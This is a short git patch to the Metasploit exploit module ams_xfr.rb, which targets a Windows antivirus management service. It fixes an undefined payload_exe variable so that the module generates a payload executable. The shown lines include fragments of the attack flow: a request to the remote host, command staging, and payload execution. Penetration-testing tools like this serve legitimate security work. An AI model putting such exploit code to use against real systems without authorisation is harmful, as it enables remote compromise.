From 8255e7a2dc1c492996a150d4091d93d64cd11fad Mon Sep 17 00:00:00 2001 From: sinn3r Date: Tue, 24 Mar 2015 00:42:22 -0500 Subject: [PATCH] Fix #4987 - undef payload_exe for ams_xfr Fix #4987 --- modules/exploits/windows/antivirus/ams_xfr.rb | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/modules/exploits/windows/antivirus/ams_xfr.rb b/modules/exploits/windows/antivirus/ams_xfr.rb index 53b66c2e87..7088c01e04 100644 --- a/modules/exploits/windows/antivirus/ams_xfr.rb +++ b/modules/exploits/windows/antivirus/ams_xfr.rb @@ -11,6 +11,7 @@ class Metasploit3 < Msf::Exploit::Remote include Msf::Exploit::CmdStager include Msf::Exploit::Remote::Tcp + include Msf::Exploit::EXE def initialize(info = {}) super(update_info(info, @@ -57,7 +58,7 @@ class Metasploit3 < Msf::Exploit::Remote print_status("Sending request to #{datastore['RHOST']}:#{datastore['RPORT']}") execute_cmdstager({ :temp => '.' }) - @payload_exe = payload_exe + @payload_exe = generate_payload_exe print_status("Attempting to execute the payload...") execute_command(@payload_exe)